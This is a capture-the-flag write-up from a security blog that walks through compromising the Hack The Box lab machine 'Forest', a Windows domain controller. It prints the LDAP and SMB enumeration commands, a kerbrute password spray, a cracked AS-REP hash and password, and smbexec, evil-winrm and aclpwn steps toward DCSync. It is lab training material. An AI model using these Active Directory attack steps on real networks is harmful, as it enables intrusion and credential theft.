130n@calvinlai.com
  • About Calvin Lai (fkclai)
  • My Work
  • Cyber Security
    • Cyber Security Centre (CSC)
      • Why we need a CSC
      • CSC Team Structure: Roles, Functions, and Tools
        • Key Function & Role
        • Tools & Platforms
        • People
        • Outsource Strategy
      • HRMC Executive Paper
  • Detection and Response
    • Playbook: Threat Prioritization & Automated Response Strategies
      • Scenario: Detecting and Mitigating a Ransomware Attack
      • Scenario: DC Sync Attack Detected and Mitigated
      • Scenario: Pass-the-Hash (PtH) Attack Detected and Contained
      • Scenario: Phishing Campaign with Malware / Credential Theft Detected and Mitigated
  • Application Architecture
    • Comparison of MVC , N-tier and Microservice Architecture
  • Application Security
    • OAuth, SAML, and OpenID Connect: Key Differences and Use Cases
    • Secure Coding Principles
    • HTTP Header Security Principles
    • Mitigating Broken Object Level Authorization (BOLA)
    • Spring Boot Validation
    • Output Encoding in JavaServer Faces (JSF)
    • Session Management Security Issues
    • Common API Security Problems
      • Broken Authentication
      • Excessive Data Exposure
      • Lack of Resources & Rate Limiting
      • Broken Function Level Authorization
      • Unsafe Consumption of APIs
    • JAVA Exception Handling
    • File Upload Validation
    • OAuth 2.0 Security
      • Insecure Storage of Access Tokens
    • Microservice Security
      • Sample Coding Demo
        • Service Implementation
        • Client Interaction
      • Security Solution for Microservices Architecture
    • Modifying and Protecting Java Class Files
      • Modify a Class File Inside a WAR File
      • Direct Bytecode Editing
        • Steps to Directly Edit a Java Class File
          • Update: Java Bytecode Editing Tools
      • Techniques to Protect Java Class Files
        • Runtime Decryption in WebLogic
    • JAVA Program
      • Secure, Concurrent Web Access Using Java and Tor
      • Creating a Maven Java project in Visual Studio Code
  • Exploit/CVE PoC
    • ZeroLogon Exploit
    • Remote Retrieved Chrome saved Encrypted Password
    • Twitter Control an RCE attack
  • Hacking Report (HTB)
    • Hits & Summary
      • Tools & Cheat Sheet
    • Windows Machine
      • Love 10.10.10.239
      • Blackfield 10.10.10.192
      • Remote 10.10.10.180
      • Sauna 10.10.10.175
      • Forest 10.10.10.161
      • Sniper
      • Json
      • Heist
      • Blue
      • Legacy
      • Resolute
      • Cascade
    • Linux Machine
      • Photobomb 10.10.11.182
      • Pandora 10.10.11.136
      • BountyHunter 10.10.11.100
      • CAP 10.10.10.245
      • Spectra 10.10.10.229
      • Ready 10.10.10.220
      • Doctor 10.10.10.209
      • Bucket 10.10.10.212
      • Blunder 10.10.10.191
      • Registry 10.10.10.159
      • Magic
      • Tabby
  • Penetration Testing
    • Web Application PenTest
    • Network/System PenTest
    • Mobile Penetration Test
      • Certificate Pinning
        • Certificate Pinning Bypass (Android)
          • Root a Android Device
          • Setup Proxy Tool - Burp Suite
      • Checklist
  • Threat Intelligence
    • Advanced Persistent Threat (APT) groups
      • North Korean APT Groups
      • Chinese APT Groups
      • Russian APT Groups
      • Other APT
  • Red Team (Windows)
    • 01 Reconnaissance
    • 02 Privileges Escalation
    • 03 Lateral Movement
    • 04 AD Attacks
      • DCSync
    • 05 Bypass-Evasion
    • 06 Kerberos Attack
    • 99 Basic Command
  • Exploitation Guide
    • 01 Reconnaissance
    • 02 Port Enumeration
    • 03 Web Enumeration
    • 04 Windows Enum & Exploit
      • Windows Credential Dumping
        • Credential Dumping: SAM
        • Credential Dumping: DCSync
      • Kerberos Attack
      • RDP
    • 05 File Enumeration
    • 06 Reverse Shell Cheat Sheet
      • Windows Reverse Shell
      • Linux Reverse Shell
    • 07 SQL Injection
    • 08 BruteForce
    • 09 XSS Bypass Checklist
    • 10 Spring Boot
    • 11 WPA
    • 12 Payload list
  • Vuln Hub (Writeup)
    • MrRobot
    • CYBERRY
    • MATRIX 1
    • Node-1
    • DPwwn-1
    • DC7
    • AiWeb-2
    • AiWeb-1
    • BrainPan
  • CTF (Writeup & Tips)
    • CTF Tools & Tips
    • Hacker One
    • CTF Learn
    • P.W.N. University - CTF 2018
    • HITCON
    • Pwnable
      • 01 Start
  • Useful Command/Tools
    • Kali
    • Windows
    • Linux
  • Offensive Security Lab & Exam
    • Lab
    • Tools for an Offensive Certification
      • Strategy for an Offensive Exam Certification
        • CVEs
        • Privilege Escalation
        • Commands
        • Impacket
  • ISO 27001
    • Disclaimer
    • What is ISO 27001
      • Implementation
    • Documentation
    • Common Mistake
    • Q&A
      • Can internal audit to replace the risk assessment
      • Is it sufficient for only the IT department head to support the ISO 27001 program
      • Does the Business Continuity Plan (BCP) and a Disaster Recovery Plan (DRP) are the same?
    • ISO 27001 Controls and Domains
      • 1. Information Security Policies
      • 2. Organization of Information Security
      • 3. Human Resource Security
      • 4. Asset Management
      • 5. Access Control
      • 6. Cryptographic Controls
      • 7. Physical and Environmental Security
      • 8: Operational Security
      • 9. Communications Security
      • 10. System Acquisition, Development, and Maintenance
      • 11. Supplier Relationships
      • 12: Information Security Incident Management
      • 13. Information Security Aspects of Business Continuity Management
      • 14. Compliance
Powered by GitBook
On this page
  • Background
  • Penetrating Methodology:
  • Service Scanning
  • Enumeration
  • Exploitation
  • Getting Less Privilege Shell
  • Walkthrough:
  • Hacking Process Part 0 – Service Scanning
  • Hacking Process Part 1 – Enumeration
  • 1.1) Strategy 1 Check port 389 LDAP Enumeration
  • 1.2) Strategy 2 - Check SMB
  • 1.4) Strategy 3 Kerberos
  • Hacking Process Part 2 – Exploitation
  • 2.1) Exploitation
  • Hacking Process Part 3 – Getting Low Privilege Access
  • Conclusion...
  • Reference Link

Was this helpful?

  1. Hacking Report (HTB)
  2. Windows Machine

Forest 10.10.10.161

Defenders think in lists. Attackers think in graphs. As long as this is true, attackers win. <John Lambert>

PreviousSauna 10.10.10.175NextSniper

Last updated 4 years ago

Was this helpful?

Owned at 03 Jan 2020

Background

is an "Easy" difficulty Windows machine. It is a Windows Domain Controller (DC) and installed an Exchange server, it requires the DC enumeration technique and Kerberos knowledge.

Anonymous LDAP can be used to access the DC server and enumerate domain objects. A service account was found in which the Kerberos pre-authentication disabled, it can be cracked to gain the initial access. This service was a member of the "Account Operators" group, which can be used to create a privileged Exchange account.

Finally, this privileged account was leveraged to gain DCSync privileges on the domain and dump the NTLM hashes.

Penetrating Methodology:

Service Scanning

  • Nmap

Enumeration

  • Kerberos

  • SMB: smbclient, smbmap, enum4linux

  • Ldap: ldapsearch

  • NTLM: impacket/GetNPUsers

Exploitation

  • Password Crack: John

  • SMB connection: impacket/smbexec

Getting Less Privilege Shell

  • Evil-winrm.rb

  • Check vulnerability: sherlock.ps1

  • secretsdump

Walkthrough:

Target machine: 10.10.10.161

Attacking (Hacker) machine: 10.10.14.18

Hacking Process Part 0 – Service Scanning

The target machine IP is 10.10.10.161. Get a basic understanding the available services of the target machine using nmap aggressive scanning to all available ports.

0.1) Quick Pre-searching

nmap 10.10.10.161, quick scan to get the opened port list

0.2) Details Analysis

Enumeration strategies

  1. LDAP - Port 389

  2. SMB - Port 135

  3. Kerberos - Port 88

Hacking Process Part 1 – Enumeration

enum4linux 10.10.10.161, get the basic information of the target machine

1.1) Strategy 1 Check port 389 LDAP Enumeration

  • nmap -p 389 --script ldap-rootdse 10.10.10.161

  • ldapsearch -x -h 10.10.10.161 -b "DC=htb,DC=local"

Keep this information for later use

Domain: HTB with the following user

  • HTB\sebastien

  • HTB\lucinda

  • HTB\svc-alfresco

  • HTB\andy

  • HTB\mark

  • HTB\santi

1.2) Strategy 2 - Check SMB

Anonymous SMB login does not allow, SMB service does not available if no user credential

smbclient -I 10.10.10.161 -L andy

smbmap -R Replication -H 10.10.10.161

1.4) Strategy 3 Kerberos

Using the kerbrute to evaluate those user accounts found at above

../../../tools/win/kerbrute/kerbrute.py -domain htb.local -users ./user.list -passwords /usr/share/wordlists/rockyou.txt -outputfile forest_passwords.txt

It finds that the svc-alfresco account is “not preauth” account. Try to get the TGT using getNPUsers

Add the 10.10.10.161 to hosts file for the htb.local and try again

Cracking AS-REP Hashes with HashCat/John

$krb5asrep$23$svc-alfresco@HTB.LOCAL:3ce79e32b438b810950ea097f50ccedf$63b3f13f672cc9d483230b4c28ea26ff574bd9906b92cd5193d8496b2059ba20d009e50f7f3eed3d5440709e3b45b949ae456f27dd61b58c4e81a70e60c41adf75af3615acdd655455daa8023a9e931e91078e72db14241e8670375052ea5e13d817f328ffc19ca80873b736892fc1b65127d2f3f852eb11cb5749b46bad8fe49349352f9b5995f26f5cd24ea13d446710004a7cd86177206b638cff8f791a8df3a3c3a059c9087a99f18c9f5b21445a306d3695aed15377b3380b4c8b3e431bcf59afedabedf890d4457c38f193d750052f952e0ea746a16e6014615b4afe1fd4a4335fa14d

john --wordlist=/usr/share/wordlists/rockyou.txt alfresco.tgt

python ../../../tools/win/impacket-0.9.20/examples/getTGT.py htb.local/svc-alfresco:s3rvice

Get the password of svc-alfresco

Hacking Process Part 2 – Exploitation

2.1) Exploitation

The password of svc_alfresco is confirmed, but it cannot be accessed by SMB

../../../tools/win/impacket-0.9.20/examples/smbexec.py htb.local/svc-alfresco:s3rvice@10.10.10.161 net user

Hacking Process Part 3 – Getting Low Privilege Access

3.1) WinRM

Test the WinRM (Windows Remote Management) service using the account

evil-winrm.rb

Get the low privilege access, check the flag

Check the svc-alfresco is not the local administrators group

3.1) Enumeration

No Vulnerability found

sherlock.ps1

Cannot get the ntlm hash using the account using secretsdump

4.1) Sherlock to find the vulnerability of the system

Objective: from SVC-aldresco to HTB.local

aclpwn -f svc-alfresco -ft user -d htb.local -t htb.local -dry -s 10.10.10.161 -u svc-alfresco -p s3rvice

aclpwn -f svc-alfresco -ft user -d htb.local -t htb.local -s 10.10.10.161 -u svc-alfresco -p s3rvice

Conclusion...

Reference Link

What is kerberos and how to attack it.

nmap -p 22,80,443 -A -o nmap-forest.txt 10.10.10.161

https://www.tarlogic.com/en/blog/how-to-attack-kerberos/
https://stealingthe.network/quick-guide-to-installing-bloodhound-in-kali-rolling/
https://securityonline.info/aclpwn/
Forest